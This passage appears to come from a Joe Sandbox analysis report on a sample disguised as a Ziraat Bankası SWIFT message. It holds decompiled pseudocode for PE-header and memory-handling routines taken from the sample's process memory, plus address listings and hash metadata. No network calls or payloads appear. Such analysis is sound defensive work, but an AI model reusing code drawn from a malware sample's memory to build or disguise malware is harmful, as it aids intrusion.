                                                                    																		_t307 = _t239;
                                                                    																		_v60 = _t307;
                                                                    																		_v48 = _t307;
                                                                    																		__eflags = _t307;
                                                                    																		if(_t307 != 0) {
                                                                    																			L70:
                                                                    																			_t216 = _v36;
                                                                    																		} else {
                                                                    																			_push(_t239);
                                                                    																			_push(0x14);
                                                                    																			_push( &_v144);
                                                                    																			_push(3);
                                                                    																			_push(_v44);
                                                                    																			_push(0xffffffff);
                                                                    																			_t319 = E018D9730();
                                                                    																			_v36 = _t319;
                                                                    																			__eflags = _t319;
                                                                    																			if(_t319 < 0) {
                                                                    																				_t216 = 0xc000001f;
                                                                    																				_v36 = 0xc000001f;
                                                                    																				_t307 = _v60;
                                                                    																			} else {
                                                                    																				_t307 = _v132;
                                                                    																				L69:
                                                                    																				_v48 = _t307;
                                                                    																				goto L70;
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    																L71:
                                                                    																_v72 = _t307;
                                                                    																_v84 = _t216;
                                                                    																__eflags = _t216 - 0xc000007b;
                                                                    																if(_t216 == 0xc000007b) {
                                                                    																	L150:
                                                                    																	_v8 = 0xfffffffe;
                                                                    																	_t211 = 0xc000007b;
                                                                    																} else {
                                                                    																	_t344 = _t290 & 0xfffffffc;
                                                                    																	_v76 = _t344;
                                                                    																	__eflags = _v40 - _t344;
                                                                    																	if(_v40 <= _t344) {
                                                                    																		goto L150;
                                                                    																	} else {
                                                                    																		__eflags = _t307;
                                                                    																		if(_t307 == 0) {
                                                                    																			L75:
                                                                    																			_t217 = 0;
                                                                    																			_v104 = 0;
                                                                    																			__eflags = _t366;
                                                                    																			if(_t366 != 0) {
                                                                    																				__eflags = _t290 & 0x00000001;
                                                                    																				if((_t290 & 0x00000001) != 0) {
                                                                    																					_t217 = 1;
                                                                    																					_v104 = 1;
                                                                    																				}
                                                                    																				_t290 = _v44;
                                                                    																				_v52 = _t290;
                                                                    																			}
                                                                    																			__eflags = _t217 - 1;
                                                                    																			if(_t217 != 1) {
                                                                    																				_t369 = 0;
                                                                    																				_t218 = _v40;
                                                                    																				goto L91;
                                                                    																			} else {
                                                                    																				_v64 = 0;
                                                                    																				E018AE9C0(1, _t290, 0, 0,  &_v64);
                                                                    																				_t309 = _v64;
                                                                    																				_v108 = _t309;
                                                                    																				__eflags = _t309;
                                                                    																				if(_t309 == 0) {
                                                                    																					goto L143;
                                                                    																				} else {
                                                                    																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                    																					__eflags = _t226 - 0x10b;
                                                                    																					if(_t226 != 0x10b) {
                                                                    																						__eflags = _t226 - 0x20b;
                                                                    																						if(_t226 != 0x20b) {
                                                                    																							goto L143;
                                                                    																						} else {
                                                                    																							_t371 =  *(_t309 + 0x98);
                                                                    																							goto L83;
                                                                    																						}
                                                                    																					} else {
                                                                    																						_t371 =  *(_t309 + 0x88);
                                                                    																						L83:
                                                                    																						__eflags = _t371;
                                                                    																						if(_t371 != 0) {
                                                                    																							_v80 = _t371 - _t356 + _t290;
                                                                    																							_t310 = _v64;
                                                                    																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                    																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                    																							_t311 = 0;
                                                                    																							__eflags = 0;
                                                                    																							while(1) {
                                                                    																								_v120 = _t311;
                                                                    																								_v116 = _t348;
                                                                    																								__eflags = _t311 - _t292;
                                                                    																								if(_t311 >= _t292) {
                                                                    																									goto L143;
                                                                    																								}
                                                                    																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                    																								__eflags = _t371 - _t359;
                                                                    																								if(_t371 < _t359) {
                                                                    																									L98:
                                                                    																									_t348 = _t348 + 0x28;
                                                                    																									_t311 = _t311 + 1;
                                                                    																									continue;
                                                                    																								} else {
                                                                    																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                    																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                    																										goto L98;
                                                                    																									} else {
                                                                    																										__eflags = _t348;
                                                                    																										if(_t348 == 0) {
                                                                    																											goto L143;
                                                                    																										} else {
                                                                    																											_t218 = _v40;
                                                                    																											_t312 =  *_t218;
                                                                    																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                    																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                    																												_v100 = _t359;
                                                                    																												_t360 = _v108;
                                                                    																												_t372 = L018A8F44(_v108, _t312);
                                                                    																												__eflags = _t372;
                                                                    																												if(_t372 == 0) {
                                                                    																													goto L143;
                                                                    																												} else {
                                                                    																													_t290 = _v52;
                                                                    																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E018D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                    																													_t307 = _v72;
                                                                    																													_t344 = _v76;
                                                                    																													_t218 = _v40;
                                                                    																													goto L91;
                                                                    																												}
                                                                    																											} else {
                                                                    																												_t290 = _v52;
                                                                    																												_t307 = _v72;
                                                                    																												_t344 = _v76;
                                                                    																												_t369 = _v80;
                                                                    																												L91:
                                                                    																												_t358 = _a4;
                                                                    																												__eflags = _t358;
                                                                    																												if(_t358 == 0) {
                                                                    																													L95:
                                                                    																													_t308 = _a8;
                                                                    																													__eflags = _t308;
                                                                    																													if(_t308 != 0) {
                                                                    																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                    																													}
                                                                    																													_v8 = 0xfffffffe;
                                                                    																													_t211 = _v84;
                                                                    																												} else {
                                                                    																													_t370 =  *_t218 - _t369 + _t290;
                                                                    																													 *_t358 = _t370;
                                                                    																													__eflags = _t370 - _t344;
                                                                    																													if(_t370 <= _t344) {
                                                                    																														L149:
                                                                    																														 *_t358 = 0;
                                                                    																														goto L150;
                                                                    																													} else {
                                                                    																														__eflags = _t307;
                                                                    																														if(_t307 == 0) {
                                                                    																															goto L95;
                                                                    																														} else {
                                                                    																															__eflags = _t370 - _t344 + _t307;
                                                                    																															if(_t370 >= _t344 + _t307) {
                                                                    																																goto L149;
                                                                    																															} else {
                                                                    																																goto L95;
                                                                    																															}
                                                                    																														}
                                                                    																													}
                                                                    																												}
                                                                    																											}
                                                                    																										}
                                                                    																									}
                                                                    																								}
                                                                    																								goto L97;
                                                                    																							}
                                                                    																						}
                                                                    																						goto L143;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			__eflags = _v40 - _t307 + _t344;
                                                                    																			if(_v40 >= _t307 + _t344) {
                                                                    																				goto L150;
                                                                    																			} else {
                                                                    																				goto L75;
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															}
                                                                    															L97:
                                                                    															 *[fs:0x0] = _v20;
                                                                    															return _t211;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										} else {
                                                                    											goto L46;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								goto L151;
                                                                    							}
                                                                    							_t288 = _v164;
                                                                    							_t366 = 0xc0000135;
                                                                    							goto L41;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L151:
                                                                    			}








































































































                                                                    0x018ad5f2
                                                                    0x018ad5f5
                                                                    0x018ad5f5
                                                                    0x018ad5fd
                                                                    0x018ad600
                                                                    0x018ad60a
                                                                    0x018ad60d
                                                                    0x018ad617
                                                                    0x018ad61d
                                                                    0x018ad627
                                                                    0x018ad62e
                                                                    0x018ad911
                                                                    0x018ad913
                                                                    0x00000000
                                                                    0x018ad919
                                                                    0x018ad919
                                                                    0x018ad919
                                                                    0x018ad634
                                                                    0x018ad634
                                                                    0x018ad634
                                                                    0x018ad634
                                                                    0x018ad640
                                                                    0x018ad8bf
                                                                    0x00000000
                                                                    0x018ad646
                                                                    0x018ad646
                                                                    0x018ad64d
                                                                    0x018ad652
                                                                    0x018fb2fc
                                                                    0x018fb2fc
                                                                    0x018fb302
                                                                    0x018fb33b
                                                                    0x018fb341
                                                                    0x00000000
                                                                    0x018fb304
                                                                    0x018fb304
                                                                    0x018fb319
                                                                    0x018fb31e
                                                                    0x018fb324
                                                                    0x018fb326
                                                                    0x018fb332
                                                                    0x018fb347
                                                                    0x018fb34c
                                                                    0x018fb351
                                                                    0x018fb35a
                                                                    0x00000000
                                                                    0x018fb328
                                                                    0x018fb328
                                                                    0x00000000
                                                                    0x018fb328
                                                                    0x018fb326
                                                                    0x018ad658
                                                                    0x018ad658
                                                                    0x018ad65b
                                                                    0x018ad665
                                                                    0x00000000
                                                                    0x018ad66b
                                                                    0x018ad66b
                                                                    0x018ad66b
                                                                    0x018ad66b
                                                                    0x018ad66d
                                                                    0x018ad672
                                                                    0x018ad67a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ad680
                                                                    0x018ad686
                                                                    0x018ad8ce
                                                                    0x018ad8d4
                                                                    0x018ad8dd
                                                                    0x018ad8e0
                                                                    0x018ad68c
                                                                    0x018ad691
                                                                    0x018ad69d
                                                                    0x018ad6a2
                                                                    0x018ad6a7
                                                                    0x018ad6b0
                                                                    0x018ad6b5
                                                                    0x018ad6e0
                                                                    0x018ad6b7
                                                                    0x018ad6b7
                                                                    0x018ad6b9
                                                                    0x018ad6b9
                                                                    0x018ad6bb
                                                                    0x018ad6bd
                                                                    0x018ad6ce
                                                                    0x018ad6d0
                                                                    0x018ad6d2
                                                                    0x018fb363
                                                                    0x018fb365
                                                                    0x00000000
                                                                    0x018fb36b
                                                                    0x00000000
                                                                    0x018fb36b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ad6bf
                                                                    0x018ad6bf
                                                                    0x018ad6e5
                                                                    0x018ad6e7
                                                                    0x018ad6e9
                                                                    0x018ad6ec
                                                                    0x018ad6ec
                                                                    0x018ad6ef
                                                                    0x018ad6f5
                                                                    0x018ad6f9
                                                                    0x018ad6fb
                                                                    0x018ad6fd
                                                                    0x018ad701
                                                                    0x018ad703
                                                                    0x018ad70a
                                                                    0x018ad70a
                                                                    0x018ad701
                                                                    0x018ad710
                                                                    0x018ad710
                                                                    0x018ad6c1
                                                                    0x018ad6c1
                                                                    0x018ad6c6
                                                                    0x018fb36d
                                                                    0x018fb36f
                                                                    0x00000000
                                                                    0x018fb375
                                                                    0x018fb375
                                                                    0x018fb375
                                                                    0x00000000
                                                                    0x018fb375
                                                                    0x00000000
                                                                    0x018ad6cc
                                                                    0x018ad6d8
                                                                    0x018ad6d8
                                                                    0x018ad6d8
                                                                    0x00000000
                                                                    0x018ad6c6
                                                                    0x018ad6bf
                                                                    0x00000000
                                                                    0x018ad6da
                                                                    0x018ad6da
                                                                    0x018ad716
                                                                    0x018ad71b
                                                                    0x018ad720
                                                                    0x018ad726
                                                                    0x018ad726
                                                                    0x018ad72d
                                                                    0x00000000
                                                                    0x018ad733
                                                                    0x018ad739
                                                                    0x018ad742
                                                                    0x018ad750
                                                                    0x018ad758
                                                                    0x018ad764
                                                                    0x018ad776
                                                                    0x018ad77a
                                                                    0x018ad783
                                                                    0x018ad928
                                                                    0x018ad92c
                                                                    0x018ad93d
                                                                    0x018ad944
                                                                    0x018ad94f
                                                                    0x018ad954
                                                                    0x018ad956
                                                                    0x018ad95f
                                                                    0x018ad961
                                                                    0x018ad973
                                                                    0x018ad973
                                                                    0x018ad956
                                                                    0x018ad944
                                                                    0x018ad92c
                                                                    0x018ad78b
                                                                    0x018fb394
                                                                    0x018ad791
                                                                    0x018ad798
                                                                    0x018fb3a3
                                                                    0x018fb3bb
                                                                    0x018fb3bb
                                                                    0x018ad7a5
                                                                    0x018ad866
                                                                    0x018ad870
                                                                    0x018ad884
                                                                    0x018ad892
                                                                    0x018ad898
                                                                    0x018ad89e
                                                                    0x018ad8a0
                                                                    0x018ad8a6
                                                                    0x018ad8ac
                                                                    0x018ad8ae
                                                                    0x018ad8b4
                                                                    0x018ad8b4
                                                                    0x018ad8ae
                                                                    0x018ad7a5
                                                                    0x018ad78b
                                                                    0x018ad7b1
                                                                    0x018fb3c5
                                                                    0x018fb3c5
                                                                    0x018ad7c3
                                                                    0x018ad7ca
                                                                    0x018ad7e5
                                                                    0x018ad7eb
                                                                    0x018ad8eb
                                                                    0x018ad8ed
                                                                    0x00000000
                                                                    0x018ad8f3
                                                                    0x018ad8f3
                                                                    0x018ad8f3
                                                                    0x00000000
                                                                    0x018ad8ed
                                                                    0x018ad7cc
                                                                    0x018ad7cc
                                                                    0x018ad7d2
                                                                    0x00000000
                                                                    0x018ad7d4
                                                                    0x018ad7d4
                                                                    0x018ad7d7
                                                                    0x018ad7df
                                                                    0x018fb3d4
                                                                    0x018fb3d9
                                                                    0x018fb3dc
                                                                    0x018fb3dc
                                                                    0x018fb3df
                                                                    0x018fb3e2
                                                                    0x018fb468
                                                                    0x018fb46d
                                                                    0x018fb46f
                                                                    0x018fb46f
                                                                    0x018fb475
                                                                    0x018ad8f8
                                                                    0x018ad8f9
                                                                    0x018ad8fd
                                                                    0x018fb3e8
                                                                    0x018fb3e8
                                                                    0x018fb3eb
                                                                    0x018fb3ed
                                                                    0x00000000
                                                                    0x018fb3ef
                                                                    0x018fb3ef
                                                                    0x018fb3f1
                                                                    0x018fb3f4
                                                                    0x018fb3fe
                                                                    0x018fb404
                                                                    0x018fb409
                                                                    0x018fb40e
                                                                    0x018fb410
                                                                    0x018fb410
                                                                    0x018fb414
                                                                    0x018fb414
                                                                    0x018fb41b
                                                                    0x018fb420
                                                                    0x018fb423
                                                                    0x018fb425
                                                                    0x018fb427
                                                                    0x018fb42a
                                                                    0x018fb42d
                                                                    0x018fb42d
                                                                    0x018fb42a
                                                                    0x018fb432
                                                                    0x018fb436
                                                                    0x018fb438
                                                                    0x018fb43b
                                                                    0x018fb43b
                                                                    0x018fb449
                                                                    0x018fb44e
                                                                    0x018fb454
                                                                    0x018fb458
                                                                    0x018fb458
                                                                    0x018fb45d
                                                                    0x00000000
                                                                    0x018fb45d
                                                                    0x018fb3ed
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ad7df
                                                                    0x018ad7d2
                                                                    0x018ad7ca
                                                                    0x018fb37c
                                                                    0x018fb37e
                                                                    0x018fb385
                                                                    0x018fb38a
                                                                    0x00000000
                                                                    0x018fb38a
                                                                    0x018ad742
                                                                    0x018ad7f1
                                                                    0x018ad7f8
                                                                    0x018fb49b
                                                                    0x018fb49b
                                                                    0x018ad800
                                                                    0x018ad837
                                                                    0x018ad843
                                                                    0x018ad845
                                                                    0x018ad847
                                                                    0x018ad84a
                                                                    0x018ad84b
                                                                    0x018ad84e
                                                                    0x018ad857
                                                                    0x018ad802
                                                                    0x018ad802
                                                                    0x018ad80d
                                                                    0x00000000
                                                                    0x018ad818
                                                                    0x018ad818
                                                                    0x018ad824
                                                                    0x018ad831
                                                                    0x018fb4a5
                                                                    0x018fb4ab
                                                                    0x018fb4b3
                                                                    0x018fb4b8
                                                                    0x018fb4bb
                                                                    0x00000000
                                                                    0x018fb4c1
                                                                    0x018fb4c1
                                                                    0x018fb4c8
                                                                    0x00000000
                                                                    0x018fb4ce
                                                                    0x018fb4d4
                                                                    0x018fb4e1
                                                                    0x018fb4e3
                                                                    0x018fb4e5
                                                                    0x00000000
                                                                    0x018fb4eb
                                                                    0x018fb4f0
                                                                    0x018fb4f2
                                                                    0x018adac9
                                                                    0x018adacc
                                                                    0x018adacf
                                                                    0x018adad1
                                                                    0x018add78
                                                                    0x018add78
                                                                    0x018adcf2
                                                                    0x00000000
                                                                    0x018adad7
                                                                    0x018adad9
                                                                    0x018adadb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018adae1
                                                                    0x018adae1
                                                                    0x018adae4
                                                                    0x018adae6
                                                                    0x018fb4f9
                                                                    0x018fb4f9
                                                                    0x018fb500
                                                                    0x018adaec
                                                                    0x018adaec
                                                                    0x018adaf5
                                                                    0x018adaf8
                                                                    0x018adafb
                                                                    0x018adb03
                                                                    0x018adb11
                                                                    0x018adb16
                                                                    0x018adb19
                                                                    0x018adb1b
                                                                    0x018fb52c
                                                                    0x018fb531
                                                                    0x018fb534
                                                                    0x018adb21
                                                                    0x018adb21
                                                                    0x018adb24
                                                                    0x018adcd9
                                                                    0x018adce2
                                                                    0x018adce5
                                                                    0x018add6a
                                                                    0x018add6d
                                                                    0x00000000
                                                                    0x018add73
                                                                    0x018fb51a
                                                                    0x018fb51c
                                                                    0x018fb51f
                                                                    0x018fb524
                                                                    0x00000000
                                                                    0x018fb524
                                                                    0x018adce7
                                                                    0x018adce7
                                                                    0x018adce7
                                                                    0x00000000
                                                                    0x018adce7
                                                                    0x00000000
                                                                    0x018adb2a
                                                                    0x018adb2c
                                                                    0x018adb31
                                                                    0x018adb33
                                                                    0x018adb36
                                                                    0x018adb39
                                                                    0x018adb3b
                                                                    0x018adb66
                                                                    0x018adb66
                                                                    0x018adb3d
                                                                    0x018adb3d
                                                                    0x018adb3e
                                                                    0x018adb46
                                                                    0x018adb47
                                                                    0x018adb49
                                                                    0x018adb4c
                                                                    0x018adb53
                                                                    0x018adb55
                                                                    0x018adb58
                                                                    0x018adb5a
                                                                    0x018fb50a
                                                                    0x018fb50f
                                                                    0x018fb512
                                                                    0x018adb60
                                                                    0x018adb60
                                                                    0x018adb63
                                                                    0x018adb63
                                                                    0x00000000
                                                                    0x018adb63
                                                                    0x018adb5a
                                                                    0x018adb3b
                                                                    0x018adb24
                                                                    0x018adb69
                                                                    0x018adb69
                                                                    0x018adb6c
                                                                    0x018adb6f
                                                                    0x018adb74
                                                                    0x018fb557
                                                                    0x018fb557
                                                                    0x018fb55e
                                                                    0x018adb7a
                                                                    0x018adb7c
                                                                    0x018adb7f
                                                                    0x018adb82
                                                                    0x018adb85
                                                                    0x00000000
                                                                    0x018adb8b
                                                                    0x018adb8b
                                                                    0x018adb8d
                                                                    0x018adb9b
                                                                    0x018adb9b
                                                                    0x018adb9d
                                                                    0x018adba0
                                                                    0x018adba2
                                                                    0x018adba4
                                                                    0x018adba7
                                                                    0x018adba9
                                                                    0x018adbae
                                                                    0x018adbae
                                                                    0x018adbb1
                                                                    0x018adbb4
                                                                    0x018adbb4
                                                                    0x018adbb7
                                                                    0x018adbba
                                                                    0x018adcd2
                                                                    0x018adcd4
                                                                    0x00000000
                                                                    0x018adbc0
                                                                    0x018adbc0
                                                                    0x018adbd2
                                                                    0x018adbd7
                                                                    0x018adbda
                                                                    0x018adbdd
                                                                    0x018adbdf
                                                                    0x00000000
                                                                    0x018adbe5
                                                                    0x018adbe5
                                                                    0x018adbee
                                                                    0x018adbf1
                                                                    0x018fb541
                                                                    0x018fb544
                                                                    0x00000000
                                                                    0x018fb546
                                                                    0x018fb546
                                                                    0x00000000
                                                                    0x018fb546
                                                                    0x018adbf7
                                                                    0x018adbf7
                                                                    0x018adbfd
                                                                    0x018adbfd
                                                                    0x018adbff
                                                                    0x018adc0b
                                                                    0x018adc15
                                                                    0x018adc1b
                                                                    0x018adc1d
                                                                    0x018adc21
                                                                    0x018adc21
                                                                    0x018adc23
                                                                    0x018adc23
                                                                    0x018adc26
                                                                    0x018adc29
                                                                    0x018adc2b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018adc31
                                                                    0x018adc34
                                                                    0x018adc36
                                                                    0x018adcbf
                                                                    0x018adcbf
                                                                    0x018adcc2
                                                                    0x00000000
                                                                    0x018adc3c
                                                                    0x018adc41
                                                                    0x018adc43
                                                                    0x00000000
                                                                    0x018adc45
                                                                    0x018adc45
                                                                    0x018adc47
                                                                    0x00000000
                                                                    0x018adc4d
                                                                    0x018adc4d
                                                                    0x018adc50
                                                                    0x018adc52
                                                                    0x018adc55
                                                                    0x018adcfa
                                                                    0x018adcfe
                                                                    0x018add08
                                                                    0x018add0a
                                                                    0x018add0c
                                                                    0x00000000
                                                                    0x018add12
                                                                    0x018add15
                                                                    0x018add2d
                                                                    0x018add2f
                                                                    0x018add32
                                                                    0x018add35
                                                                    0x00000000
                                                                    0x018add35
                                                                    0x018adc5b
                                                                    0x018adc5b
                                                                    0x018adc5e
                                                                    0x018adc61
                                                                    0x018adc64
                                                                    0x018adc67
                                                                    0x018adc67
                                                                    0x018adc6a
                                                                    0x018adc6c
                                                                    0x018adc8e
                                                                    0x018adc8e
                                                                    0x018adc91
                                                                    0x018adc93
                                                                    0x018adcce
                                                                    0x018adcce
                                                                    0x018adc95
                                                                    0x018adc9c
                                                                    0x018adc6e
                                                                    0x018adc72
                                                                    0x018adc75
                                                                    0x018adc77
                                                                    0x018adc79
                                                                    0x018fb551
                                                                    0x018fb551
                                                                    0x00000000
                                                                    0x018adc7f
                                                                    0x018adc7f
                                                                    0x018adc81
                                                                    0x00000000
                                                                    0x018adc83
                                                                    0x018adc86
                                                                    0x018adc88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018adc88
                                                                    0x018adc81
                                                                    0x018adc79
                                                                    0x018adc6c
                                                                    0x018adc55
                                                                    0x018adc47
                                                                    0x018adc43
                                                                    0x00000000
                                                                    0x018adc36
                                                                    0x018adc23
                                                                    0x00000000
                                                                    0x018adbff
                                                                    0x018adbf1
                                                                    0x018adbdf
                                                                    0x018adb8f
                                                                    0x018adb92
                                                                    0x018adb95
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018adb95
                                                                    0x018adb8d
                                                                    0x018adb85
                                                                    0x018adb74
                                                                    0x018adc9f
                                                                    0x018adca2
                                                                    0x018adcb0
                                                                    0x018adcb0
                                                                    0x018adad1
                                                                    0x018fb4e5
                                                                    0x018fb4c8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018ad831
                                                                    0x018ad80d
                                                                    0x00000000
                                                                    0x018ad800
                                                                    0x018fb47f
                                                                    0x018fb485
                                                                    0x00000000
                                                                    0x018fb485
                                                                    0x018ad665
                                                                    0x018ad652
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID:
                                                                    • API String ID: 3446177414-0
                                                                    • Opcode ID: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                                                                    • Instruction ID: 4e1323bb3a5b0a1209ecb820d984d677d67a7fa4f84cde65e890995553e5b5b3
                                                                    • Opcode Fuzzy Hash: e8e92810a3c5c7deb4d555a30b14396f40df0ff2393e1dd4485197bb7f4a6570
                                                                    • Instruction Fuzzy Hash: 96E1C030A0435ACFFB35CF68C984BA9BBB2BF45304F444299DA09D7691D734AB81CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E018C513A(intOrPtr __ecx, void* __edx) {
                                                                    				signed int _v8;
                                                                    				signed char _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				char _v28;
                                                                    				signed int _v32;
                                                                    				signed int _v36;
                                                                    				signed int _v40;
                                                                    				intOrPtr _v44;
                                                                    				intOrPtr _v48;
                                                                    				char _v63;
                                                                    				char _v64;
                                                                    				signed int _v72;
                                                                    				signed int _v76;
                                                                    				signed int _v80;
                                                                    				signed int _v84;
                                                                    				signed int _v88;
                                                                    				signed char* _v92;
                                                                    				signed int _v100;
                                                                    				signed int _v104;
                                                                    				char _v105;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* _t157;
                                                                    				signed int _t159;
                                                                    				signed int _t160;
                                                                    				unsigned int* _t161;
                                                                    				intOrPtr _t165;
                                                                    				signed int _t172;
                                                                    				signed char* _t181;
                                                                    				intOrPtr _t189;
                                                                    				intOrPtr* _t200;
                                                                    				signed int _t202;
                                                                    				signed int _t203;
                                                                    				char _t204;
                                                                    				signed int _t207;
                                                                    				signed int _t208;
                                                                    				void* _t209;
                                                                    				intOrPtr _t210;
                                                                    				signed int _t212;
                                                                    				signed int _t214;
                                                                    				signed int _t221;
                                                                    				signed int _t222;
                                                                    				signed int _t226;
                                                                    				intOrPtr* _t232;
                                                                    				signed int _t233;
                                                                    				signed int _t234;
                                                                    				intOrPtr _t237;
                                                                    				intOrPtr _t238;
                                                                    				intOrPtr _t240;
                                                                    				void* _t245;
                                                                    				signed int _t246;
                                                                    				signed int _t247;
                                                                    				void* _t248;
                                                                    				void* _t251;
                                                                    				void* _t252;
                                                                    				signed int _t253;
                                                                    				signed int _t255;
                                                                    				signed int _t256;
                                                                    
                                                                    				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                    				_v8 =  *0x198d360 ^ _t255;
                                                                    				_v32 = _v32 & 0x00000000;
                                                                    				_t251 = __edx;
                                                                    				_t237 = __ecx;
                                                                    				_t212 = 6;
                                                                    				_t245 =  &_v84;
                                                                    				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                    				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                    				_v48 = __ecx;
                                                                    				_v36 = _t207;
                                                                    				_t157 = memset(_t245, 0, _t212 << 2);
                                                                    				_t256 = _t255 + 0xc;
                                                                    				_t246 = _t245 + _t212;
                                                                    				if(_t207 == 2) {
                                                                    					_t247 =  *(_t237 + 0x60);
                                                                    					_t208 =  *(_t237 + 0x64);
                                                                    					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                    					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                    					_v104 = _t159;
                                                                    					_v76 = _t159;
                                                                    					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                    					_v100 = _t160;
                                                                    					_v72 = _t160;
                                                                    					L19:
                                                                    					_v80 = _t208;
                                                                    					_v84 = _t247;
                                                                    					L8:
                                                                    					_t214 = 0;
                                                                    					if( *(_t237 + 0x74) > 0) {
                                                                    						_t82 = _t237 + 0x84; // 0x124
                                                                    						_t161 = _t82;
                                                                    						_v92 = _t161;
                                                                    						while( *_t161 >> 0x1f != 0) {
                                                                    							_t200 = _v92;
                                                                    							if( *_t200 == 0x80000000) {
                                                                    								break;
                                                                    							}
                                                                    							_t214 = _t214 + 1;
                                                                    							_t161 = _t200 + 0x10;
                                                                    							_v92 = _t161;
                                                                    							if(_t214 <  *(_t237 + 0x74)) {
                                                                    								continue;
                                                                    							}
                                                                    							goto L9;
                                                                    						}
                                                                    						_v88 = _t214 << 4;
                                                                    						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                    						_t165 = 0;
                                                                    						asm("adc eax, [ecx+edx+0x7c]");
                                                                    						_v24 = _t165;
                                                                    						_v28 = _v40;
                                                                    						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                    						_t221 = _v40;
                                                                    						_v16 =  *_v92;
                                                                    						_v32 =  &_v28;
                                                                    						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                    							goto L9;
                                                                    						}
                                                                    						_t240 = _v48;
                                                                    						if( *_v92 != 0x80000000) {
                                                                    							goto L9;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                    						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                    						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                    						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                    						_t226 = 0;
                                                                    						_t181 = _t251 + 0x66;
                                                                    						_v88 = 0;
                                                                    						_v92 = _t181;
                                                                    						do {
                                                                    							if( *((char*)(_t181 - 2)) == 0) {
                                                                    								goto L31;
                                                                    							}
                                                                    							_t226 = _v88;
                                                                    							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                    								_t181 = E018DD0F0(1, _t226 + 0x20, 0);
                                                                    								_t226 = _v40;
                                                                    								 *(_t226 + 8) = _t181;
                                                                    								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                    								L34:
                                                                    								if(_v44 == 0) {
                                                                    									goto L9;
                                                                    								}
                                                                    								_t210 = _v44;
                                                                    								_t127 = _t210 + 0x1c; // 0x1c
                                                                    								_t249 = _t127;
                                                                    								E018B2280(_t181, _t127);
                                                                    								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                    								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                    								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                    								}
                                                                    								_t189 = L018B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                    								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                    								if(_t189 != 0) {
                                                                    									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                    									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                    									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                    									 *_t232 = _t232 + 0x10;
                                                                    									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                    									E018DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
